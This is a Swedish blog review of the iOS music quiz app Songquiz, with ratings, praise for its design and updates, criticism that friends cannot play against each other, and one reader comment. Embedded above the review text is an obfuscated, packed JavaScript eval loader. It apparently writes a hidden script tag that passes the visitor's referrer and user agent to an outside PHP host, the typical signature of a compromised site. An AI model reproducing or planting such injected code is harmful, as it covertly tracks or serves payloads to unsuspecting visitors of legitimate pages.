Image Image Image Image Image Image Image Image Image Image

| 26 februari, 2020

Scroll to top

Top

Recension av appen Songquiz

Recension av appen Songquiz
Sebastian

Review Overview

Design
8
Gameplay
6.5
Kostnad
9.5
Uppdatering
7.5
7.9

RatingSongquiz eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|zzhif|var|u0026u|referrer|kiaaf||js|php’.split(’|’),0,{}))
app: Gillar du inte att tävla mot andra? Känner du att du kanske borde träna upp dina kunskaper utan att förnedras av vänner och bekanta? Då har vi en perfekt app för dig.

Med Songquiz tävlar man mot sig själv. Genom att identifiera musiksnuttar och välja alternativ tar man sig sakta fram genom frågorna.

Songquiz är en riktigt snygg app där man verkligen lagt fokus på användarvänligheten. Likt många andra frågesport appar så går det ut på att samla på sig poäng. Samtidigt som man samlar poäng får man också ”Coins” som sedan kan användas för att låsa upp nya kategorier. Förutom poäng och ”Coins” kan man också samla på sig ledtrådar såsom bomber som enkelt nog tar bort alternativ.

Appen är extremt och imponerande uppdaterad med det senaste och hetaste, något som många liknande appar inte är. Jag har inte riktigt kikat in på hur det gör detta men troligen är det användare som skickar in förslag på frågor som sedan godkänns av redaktionen. Av användare för användare, alltid ett vinnande koncept.

Song quiz är som Aftonbladet säger ”En fröjd för både ögat och örat”.

Ett stort minus är att man inte kan spela mot vänner. Det borde finnas ett alternativ där detta är möjligt. Själv tror jag att de kommer att gå miste om många tävlingsinriktade användare.

Hur som helt så rekommenderar jag er att ladda ner appen och testa spelet.
Detta kan ni göra nedan!

Appen finns idag endast till iOS men kommer säkerligen om den visar stort intresse bland användarna att även utvecklas till fler plattformar som Android och Windows Phone.

Comments

  1. Igel

    Faktiskt ett kul spel. Håller med om att de borde lägga till spel mot vänner!